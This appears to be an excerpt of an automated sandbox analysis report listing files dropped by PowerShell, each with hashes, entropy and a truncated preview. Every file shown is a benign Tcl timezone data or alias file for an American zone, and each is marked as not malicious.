                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Vincennes) {.. {-9223372036854775808 -21007 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-747244800 -18000 1 CDT}.. {-733942800 -21600 0 CST}.. {-526492800 -18000 1 CDT}.. {-513190800 -21600 0 CST}.. {-495043200 -18000 1 CDT}.. {-481741200 -21600 0 CST}.. {-462996000 -18000 1 CDT}.. {-450291600 -21600 0 CST}.. {-431539200 -18000 1 CDT}.. {-418237200 -21600 0 CST}.. {-400089600 -18000 1 CDT}.. {-386787600 -21600 0 CST}.. {-368640000 -18000 1 CDT}.. {-355338000 -21600 0 CST}.. {-337190400 -18000 1 CDT}.. {-323888400 -21600 0 CST}.. {-305740800 -18000 1 CDT}.. {-289414800 -21600 0 CST}.. {-273686400 -18000 1 CDT
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7410
                                                                                                                                                                                                                              Entropy (8bit):3.8775722319777968
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:uq0KeKrv7c1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:unKxv7yN0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:880526DC23E7BDB00506D7EC2A885907
                                                                                                                                                                                                                              SHA1:DB3B13A2A4BF80E7B71C7F0604A0A80EF070B9BA
                                                                                                                                                                                                                              SHA-256:4B293FDB7680C4597B8C885333719214492ECF09BD5EA342D1EC15F2BF9C8605
                                                                                                                                                                                                                              SHA-512:42EEDC5EA28781D62A457F4843F38D0A3FEFCAD83BA01B07CEF0FA169C6440960E04BABD272C5E9AF2F4B0DBB2A786EF9221A48F084F16752E6D0EA66C31911E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Winamac) {.. {-9223372036854775808 -20785 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-747244800 -18000 1 CDT}.. {-733942800 -21600 0 CST}.. {-715795200 -18000 1 CDT}.. {-702493200 -21600 0 CST}.. {-684345600 -18000 1 CDT}.. {-671043600 -21600 0 CST}.. {-652896000 -18000 1 CDT}.. {-639594000 -21600 0 CST}.. {-620841600 -18000 1 CDT}.. {-608144400 -21600 0 CST}.. {-589392000 -18000 1 CDT}.. {-576090000 -21600 0 CST}.. {-557942400 -18000 1 CDT}.. {-544640400 -21600 0 CST}.. {-526492800 -18000 1 CDT}.. {-513190800 -21600 0 CST}.. {-495043200 -18000 1 CDT}.. {-481741200 -21600 0 CST}.. {-463593600 -18000 1 CDT}.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):233
                                                                                                                                                                                                                              Entropy (8bit):4.7047837427916095
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y73GK7JHAIgp3GKZRN/2903GfJ4903GK8:MByMY3GK7Kp3GKnt2903GfJ4903GK8
                                                                                                                                                                                                                              MD5:DEE404D54FD707C4A27F464B5F19D135
                                                                                                                                                                                                                              SHA1:AD95D04738F6B15A93DED1DE6B5FA9F47C8E38CB
                                                                                                                                                                                                                              SHA-256:437DA148B94DBA4CEA402169878541DB9C3419ABAB6750D1C36625DD3053019E
                                                                                                                                                                                                                              SHA-512:421D6AF30F0C64EA6CB9F9DC4E7EF9E8EE5945F81A5E82A6D959D32AD69F325770DB6A07D8F52EFE7EE7F6C3AD4E1F34AA30A6B5E006C928119A54E746D6FE6B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Indiana/Indianapolis)]} {.. LoadTimeZoneFile America/Indiana/Indianapolis..}..set TZData(:America/Indianapolis) $TZData(:America/Indiana/Indianapolis)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7638
                                                                                                                                                                                                                              Entropy (8bit):3.8629745113156004
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:/nGaLV911sF7Lv/PCewtA8CzSPyDLbrcUia:/GPlLv/PCenJzS6cy
                                                                                                                                                                                                                              MD5:DBF9C2CCF786A593C9D6E4F4BB37ACE9
                                                                                                                                                                                                                              SHA1:4D2332A530A36E6DB2802DD9FA2DAF5C0594D5EA
                                                                                                                                                                                                                              SHA-256:5A1F7F5EDAD0251B73C33E7B5DDEE194646E9D3992B169DC1A64D155765D472C
                                                                                                                                                                                                                              SHA-512:70D75371497CED3B6C731C95299CDD5F8F49C3C6EEDDF31EB05D008769D76ACFE8BFA9A2ECE45BD0BA2E279BBEF65945955791EFC04A569F5CAA13665CD2545F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Inuvik) {.. {-9223372036854775808 0 0 -00}.. {-536457600 -28800 0 PST}.. {-147888000 -21600 1 PDDT}.. {-131558400 -28800 0 PST}.. {315558000 -25200 0 MST}.. {325674000 -21600 1 MDT}.. {341395200 -25200 0 MST}.. {357123600 -21600 1 MDT}.. {372844800 -25200 0 MST}.. {388573200 -21600 1 MDT}.. {404899200 -25200 0 MST}.. {420022800 -21600 1 MDT}.. {436348800 -25200 0 MST}.. {452077200 -21600 1 MDT}.. {467798400 -25200 0 MST}.. {483526800 -21600 1 MDT}.. {499248000 -25200 0 MST}.. {514976400 -21600 1 MDT}.. {530697600 -25200 0 MST}.. {544611600 -21600 1 MDT}.. {562147200 -25200 0 MST}.. {576061200 -21600 1 MDT}.. {594201600 -25200 0 MST}.. {607510800 -21600 1 MDT}.. {625651200 -25200 0 MST}.. {638960400 -21600 1 MDT}.. {657100800 -25200 0 MST}.. {671014800 -21600 1 MDT}.. {688550400 -25200 0 MST}.. {702464400 -21600 1 MDT}.. {7200000
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7671
                                                                                                                                                                                                                              Entropy (8bit):3.832645570123566
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:7FE5Ct/cQ1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:7FEct/N0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:8020712BBA127EA8AB52E8F5DB14286E
                                                                                                                                                                                                                              SHA1:DAEBC76FE10770D3FC2B5E1C14823B2B5543BA35
                                                                                                                                                                                                                              SHA-256:AFC4627879F4A618F5E3BA9EA123F3212E161F4CCFD0DF46F3B6B7CD2E2C0D7E
                                                                                                                                                                                                                              SHA-512:2F5C63F427A5DEDD5BF2B3867BE4C13774E9276C1472BF4170BCB2DA462B848CC8088743D032765133EE138388DF4217E4FC1475B12D2C8AF657A45ED6FEDE93
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Iqaluit) {.. {-9223372036854775808 0 0 -00}.. {-865296000 -14400 0 EWT}.. {-769395600 -14400 1 EPT}.. {-765396000 -18000 0 EST}.. {-147898800 -10800 1 EDDT}.. {-131569200 -18000 0 EST}.. {325666800 -14400 1 EDT}.. {341388000 -18000 0 EST}.. {357116400 -14400 1 EDT}.. {372837600 -18000 0 EST}.. {388566000 -14400 1 EDT}.. {404892000 -18000 0 EST}.. {420015600 -14400 1 EDT}.. {436341600 -18000 0 EST}.. {452070000 -14400 1 EDT}.. {467791200 -18000 0 EST}.. {483519600 -14400 1 EDT}.. {499240800 -18000 0 EST}.. {514969200 -14400 1 EDT}.. {530690400 -18000 0 EST}.. {544604400 -14400 1 EDT}.. {562140000 -18000 0 EST}.. {576054000 -14400 1 EDT}.. {594194400 -18000 0 EST}.. {607503600 -14400 1 EDT}.. {625644000 -18000 0 EST}.. {638953200 -14400 1 EDT}.. {657093600 -18000 0 EST}.. {671007600 -14400 1 EDT}.. {688543200 -18000 0 EST}.. {7024
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):847
                                                                                                                                                                                                                              Entropy (8bit):4.206296468996689
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5seRvZGjFS/uk1p/uue/udYR/u+zN5hi/uW9/uoUF0/u8Bb/u33RU/uMZ8/unuR3:5jUjFo1pFGzfAYFqB43RMER3
                                                                                                                                                                                                                              MD5:95B59E3EA2A270A34BDF98AA899203C8
                                                                                                                                                                                                                              SHA1:93599597797F4BAFE5C75179FB795058B1E3527D
                                                                                                                                                                                                                              SHA-256:4B9D5177CBA057CD53D53120A49B8A47ECCB00150018581A84851E9D5437D643
                                                                                                                                                                                                                              SHA-512:032BC07F9E92B756A0732AECC2DFEC4C89A58B3D6D3CA57A0F99F2AD1D51676804C7B6CE50EB3B37BB8A1EF382168AC83989D609D37C57308E29B51F1FDEFB1E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Jamaica) {.. {-9223372036854775808 -18430 0 LMT}.. {-2524503170 -18430 0 KMT}.. {-1827687170 -18000 0 EST}.. {126248400 -18000 0 EST}.. {126687600 -14400 1 EDT}.. {152085600 -18000 0 EST}.. {162370800 -14400 1 EDT}.. {183535200 -18000 0 EST}.. {199263600 -14400 1 EDT}.. {215589600 -18000 0 EST}.. {230713200 -14400 1 EDT}.. {247039200 -18000 0 EST}.. {262767600 -14400 1 EDT}.. {278488800 -18000 0 EST}.. {294217200 -14400 1 EDT}.. {309938400 -18000 0 EST}.. {325666800 -14400 1 EDT}.. {341388000 -18000 0 EST}.. {357116400 -14400 1 EDT}.. {372837600 -18000 0 EST}.. {388566000 -14400 1 EDT}.. {404892000 -18000 0 EST}.. {420015600 -14400 1 EDT}.. {436341600 -18000 0 EST}.. {441781200 -18000 0 EST}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):211
                                                                                                                                                                                                                              Entropy (8bit):4.94277888588308
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7/MI6HAIgp/MIwRN/290pPGe90/MIz:MByMY/Myp/M9Rt290h390/M4
                                                                                                                                                                                                                              MD5:E020D4F9CB1AF91D373CD9F3C2247428
                                                                                                                                                                                                                              SHA1:0ADF2E9F8D9F8641E066764BA1BAF068F0332CE9
                                                                                                                                                                                                                              SHA-256:4A0495852CD4D0652B82FB57024645916DB8F192EEF9A82AFD580D87F4D496ED
                                                                                                                                                                                                                              SHA-512:03190F0E7EC35A358670B1617CB5C17EA3DD41195B2C4B748479D80ABAB4DB395293F688D94B87662D0469F6C5885CF7E7C9A995493A191905753F740DF659E1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Jujuy)]} {.. LoadTimeZoneFile America/Argentina/Jujuy..}..set TZData(:America/Jujuy) $TZData(:America/Argentina/Jujuy)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8682
                                                                                                                                                                                                                              Entropy (8bit):3.9620285142779728
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:/fCG0rHPC9+j1giaJCUbtp0nFI+g/iexpCVaBnNnt61nctE1:/aG0rq9DiaJCUbPI+D/iMpCIBSuk
                                                                                                                                                                                                                              MD5:8160A0D27EECEF40F6F34A06D5D02BE6
                                                                                                                                                                                                                              SHA1:7CAA64F83BAA0C23EE05A72BB1079AA552FA2F3D
                                                                                                                                                                                                                              SHA-256:5FBE6A1FA2D3DFE23C7378E425F32BEBCA44735DA25EA075A7E5CE24BFD4049D
                                                                                                                                                                                                                              SHA-512:59B8D04595007B45E582E6D17734999074CA67A93F5DF742EFE1EB78DB8ABD359D4C3B213B678C6A46040A13AAB709A994B6A532D720D3EF6FCA2730ABF4885E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Juneau) {.. {-9223372036854775808 54139 0 LMT}.. {-3225223727 -32261 0 LMT}.. {-2188954939 -28800 0 PST}.. {-883584000 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-757353600 -28800 0 PST}.. {-31507200 -28800 0 PST}.. {-21477600 -25200 1 PDT}.. {-5756400 -28800 0 PST}.. {9972000 -25200 1 PDT}.. {25693200 -28800 0 PST}.. {41421600 -25200 1 PDT}.. {57747600 -28800 0 PST}.. {73476000 -25200 1 PDT}.. {89197200 -28800 0 PST}.. {104925600 -25200 1 PDT}.. {120646800 -28800 0 PST}.. {126698400 -25200 1 PDT}.. {152096400 -28800 0 PST}.. {162381600 -25200 1 PDT}.. {183546000 -28800 0 PST}.. {199274400 -25200 1 PDT}.. {215600400 -28800 0 PST}.. {230724000 -25200 1 PDT}.. {247050000 -28800 0 PST}.. {262778400 -25200 1 PDT}.. {278499600 -28800 0 PST}.. {294228000 -25200 1 PDT}.. {309949
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9553
                                                                                                                                                                                                                              Entropy (8bit):3.853353361425414
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:tfTwKdrdJ9+StCt/cL1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:tfUKNdJ9+SItON0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:D721B38F1FFF1A6F5C02B72ECC06CDE5
                                                                                                                                                                                                                              SHA1:E70D99A9FC1DA9F30389129EE00FE20FA79D66A8
                                                                                                                                                                                                                              SHA-256:9EB1F2B19C44A55D6CC9FD1465BAF6535856941C067831E4B5E0494665014BF5
                                                                                                                                                                                                                              SHA-512:3C82A8C27026228F359FD96A4306F1BC337DE655FD1BA02C4399162E44DE59AD58CE569DA5AEA36E586C3BDEE7256420AABB84B44D277E244FE5AD771B4BE307
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Kentucky/Louisville) {.. {-9223372036854775808 -20582 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-1546279200 -21600 0 CST}.. {-1535904000 -18000 1 CDT}.. {-1525280400 -21600 0 CST}.. {-905097600 -18000 1 CDT}.. {-891795600 -21600 0 CST}.. {-883591200 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-747251940 -18000 1 CDT}.. {-744224400 -21600 0 CST}.. {-620841600 -18000 1 CDT}.. {-608144400 -21600 0 CST}.. {-589392000 -18000 1 CDT}.. {-576090000 -21600 0 CST}.. {-557942400 -18000 1 CDT}.. {-544640400 -21600 0 CST}.. {-526492800 -18000 1 CDT}.. {-513190800 -21600 0 CST}.. {-495043200 -18000 1 CDT}.. {-481741200 -21600 0 CST}.. {-463593600 -18000
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8558
                                                                                                                                                                                                                              Entropy (8bit):3.869494272122571
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:4F8qMahLi8hR1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:4F8HaUqJN0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:AED6497590DA305D16AC034979C8B1E9
                                                                                                                                                                                                                              SHA1:AD6F1788310A3A5A761873FEF1A32416B7DBCA89
                                                                                                                                                                                                                              SHA-256:1C6C7FB0AE628EB6BB305B51859C4E5594A6B0876C386ED9C1C3355E7CB37AE1
                                                                                                                                                                                                                              SHA-512:58D960AB5F2D9F8E4DD0171E5E36CE2E072F74A7AFDBC43F9340BBCF0CDC0D060AC895F9FCF551F4CC7EB6DBF2E9835C8C3D58E87CA4FBC98C720F51C462EDCD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Kentucky/Monticello) {.. {-9223372036854775808 -20364 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-63136800 -21600 0 CST}.. {-52934400 -18000 1 CDT}.. {-37213200 -21600 0 CST}.. {-21484800 -18000 1 CDT}.. {-5763600 -21600 0 CST}.. {9964800 -18000 1 CDT}.. {25686000 -21600 0 CST}.. {41414400 -18000 1 CDT}.. {57740400 -21600 0 CST}.. {73468800 -18000 1 CDT}.. {89190000 -21600 0 CST}.. {104918400 -18000 1 CDT}.. {120639600 -21600 0 CST}.. {126691200 -18000 1 CDT}.. {152089200 -21600 0 CST}.. {162374400 -18000 1 CDT}.. {183538800 -21600 0 CST}.. {199267200 -18000 1 CDT}.. {215593200 -21600 0 CST}.. {230716800 -18000
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):204
                                                                                                                                                                                                                              Entropy (8bit):4.8670778268802195
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y73GKaHAIgp3GKIN/2901iZ903GKT:MByMY3GKDp3GKIt290Q903GKT
                                                                                                                                                                                                                              MD5:50434016470AC512A8E2BEBA0BCEBC15
                                                                                                                                                                                                                              SHA1:F3541F6EE201FA33C66042F5C11A26434D37D42C
                                                                                                                                                                                                                              SHA-256:D66E77E6FF789D4D6CA13CDB204B977E1FE64BE9AFEE7B41F2C17ED8217FD025
                                                                                                                                                                                                                              SHA-512:EB1FF97050B7E067DCB68FF7C8F912C8A0C02144BB8E2EAA58C1136C6CC4A2B98C897DD23BB1E9C82D9AF6D028EE45227F97676CB34B6B830CDF5D707B990E57
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Indiana/Knox)]} {.. LoadTimeZoneFile America/Indiana/Knox..}..set TZData(:America/Knox_IN) $TZData(:America/Indiana/Knox)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):204
                                                                                                                                                                                                                              Entropy (8bit):4.9362668992592456
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/2901Qv090ppv:MByMYbpwt290ev090b
                                                                                                                                                                                                                              MD5:FE9CEC6C50DF451B599B98AE8A434FF7
                                                                                                                                                                                                                              SHA1:60F997825766662B2C5415FBE4D65CEA6D326537
                                                                                                                                                                                                                              SHA-256:5AF9B28C48661FDC81762D249B716BA077F0A40ECF431D34A893BB7EABA57965
                                                                                                                                                                                                                              SHA-512:1311605021871BAFAF321AA48B352262C6BA42149101CCD4FDD4000435B2584AC564E0F76D481BB181767C010FD922BAA4E4EBB401AC2FF27B21874D89332872
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Kralendijk) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):218
                                                                                                                                                                                                                              Entropy (8bit):4.902526230255025
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/290WDm2OHphvoHvKZdcyFXmBVVON:MB86290ymdHphvCvKfcyy/ON
                                                                                                                                                                                                                              MD5:3BC04900A19D0152A31B353C6715A97B
                                                                                                                                                                                                                              SHA1:58A6D49E0B6FA00CBEAFD695D604D740AD63C54E
                                                                                                                                                                                                                              SHA-256:5488D98AA3C29D710C6AF92C42ACE36550A5BFF78C155CDF8769EE31F71CF033
                                                                                                                                                                                                                              SHA-512:65302935090F98A81443A1E1158911F57C3A1564564CD401CA72DDBF66D967DB564EF5AE8A4083D83984B9EF55AB53159010EFE2DB5D7A723F7EA61A1795322D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/La_Paz) {.. {-9223372036854775808 -16356 0 LMT}.. {-2524505244 -16356 0 CMT}.. {-1205954844 -12756 1 BST}.. {-1192307244 -14400 0 -04}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):460
                                                                                                                                                                                                                              Entropy (8bit):4.2444415392593875
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB86290B2mdH4VCvvCOt/Os/OCQXR/uFfC3/O3e/uFbs/OX/OqF/O+8/OOS1F5/D:59etvqOVLOR/uGD/utsg38xSP5r
                                                                                                                                                                                                                              MD5:5F41E848D2DDE91261F45CB577B1B0A9
                                                                                                                                                                                                                              SHA1:DF284499CF57479ADE5E1D3DC01D6DCCF6AFDFE1
                                                                                                                                                                                                                              SHA-256:6E01002F264DF9A6FC247F95399F4F42DCCC7AB890B0C259DE93DCC97DEC89CE
                                                                                                                                                                                                                              SHA-512:2F5472F812734E892182632B8A34A4AD7B342541D0C3F1107BD95FFBE25D9351A0CDF5F58F35A1F37365DDF8A8A5D883C89C3CC40A9AD09D54CA152DC6BE1A09
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Lima) {.. {-9223372036854775808 -18492 0 LMT}.. {-2524503108 -18516 0 LMT}.. {-1938538284 -14400 0 -05}.. {-1002052800 -18000 0 -05}.. {-986756400 -14400 1 -05}.. {-971035200 -18000 0 -05}.. {-955306800 -14400 1 -05}.. {-939585600 -18000 0 -05}.. {512712000 -18000 0 -05}.. {544248000 -18000 0 -05}.. {638942400 -18000 0 -05}.. {765172800 -18000 0 -05}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9726
                                                                                                                                                                                                                              Entropy (8bit):3.8515163794355916
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:/uX68CWSgG0U9bFzN6IkWq/WHQt/RY4yP:/uX68CWSgGVbGBt/M
                                                                                                                                                                                                                              MD5:4D4F198238E4E76753411896239041C3
                                                                                                                                                                                                                              SHA1:AD41D199DF0B794B5AB7F165C8A141787FAAC9A9
                                                                                                                                                                                                                              SHA-256:DA3F7572F04E6AE78B8F044761E6F48D37EE259A9C1FE15A67072CC64A299FDB
                                                                                                                                                                                                                              SHA-512:BA39D174B73B1D4B09E8AC07291BED0B9658A4330AE50881080F0E37C35BD8A6F55C49F1D649ED1F19CE47002435D8724048759DFC813BF9C2E9B06B581486FF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Los_Angeles) {.. {-9223372036854775808 -28378 0 LMT}.. {-2717640000 -28800 0 PST}.. {-1633269600 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-1601820000 -25200 1 PDT}.. {-1583679600 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-757353600 -28800 0 PST}.. {-687967140 -25200 1 PDT}.. {-662655600 -28800 0 PST}.. {-620838000 -25200 1 PDT}.. {-608137200 -28800 0 PST}.. {-589388400 -25200 1 PDT}.. {-576082800 -28800 0 PST}.. {-557938800 -25200 1 PDT}.. {-544633200 -28800 0 PST}.. {-526489200 -25200 1 PDT}.. {-513183600 -28800 0 PST}.. {-495039600 -25200 1 PDT}.. {-481734000 -28800 0 PST}.. {-463590000 -25200 1 PDT}.. {-450284400 -28800 0 PST}.. {-431535600 -25200 1 PDT}.. {-418230000 -28800 0 PST}.. {-400086000 -25200 1 PDT}.. {-386780400 -28800 0 PST}.. {-368636400 -25200 1 PDT}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):228
                                                                                                                                                                                                                              Entropy (8bit):4.911677030377383
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y71PiKp4o2HAIgp1PiKp4BvN/290hp4901PiKp44v:MByMYPyApPydt290P490Pyi
                                                                                                                                                                                                                              MD5:ACE87B25FE5604C83127A9F148A34C8C
                                                                                                                                                                                                                              SHA1:25C8D85B4740C53F40421D0DADCA95225EAB7829
                                                                                                                                                                                                                              SHA-256:F85C1253F4C1D3E85757D3DEA4FD3C61F1AA7BE6BAAE8CB8579278412905ACB2
                                                                                                                                                                                                                              SHA-512:AC0662B19F336474B146E06778E1FB43B941ABC8FD51BDB31B2640C94CCDFBE7659960EF4FD18329AFA7AD11316FC08D3CF33BB27931EA70AA7218667A8D0737
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Kentucky/Louisville)]} {.. LoadTimeZoneFile America/Kentucky/Louisville..}..set TZData(:America/Louisville) $TZData(:America/Kentucky/Louisville)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):207
                                                                                                                                                                                                                              Entropy (8bit):4.900350318979456
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290h48h490ppv:MByMYbpwt290/490b
                                                                                                                                                                                                                              MD5:83CE86174ADB5F276AABD26FE132BB55
                                                                                                                                                                                                                              SHA1:925E3F4A5DB1A2C33B3A537C8DBC9CFE309FA340
                                                                                                                                                                                                                              SHA-256:1E786229B84CE86DB6316B24C85F7CF4CFE66011F973053AD0E108BFCC9A9DE2
                                                                                                                                                                                                                              SHA-512:BA2AC5571D772B577735BC8E43FF8023228BC61A974DCCE0EAE20EC9B11FC757E56CABDAE00933A99834108114E598B7EC149BB017EB80BE18301A655F341A36
                                                                                                                                                                                                                              Malicious:false
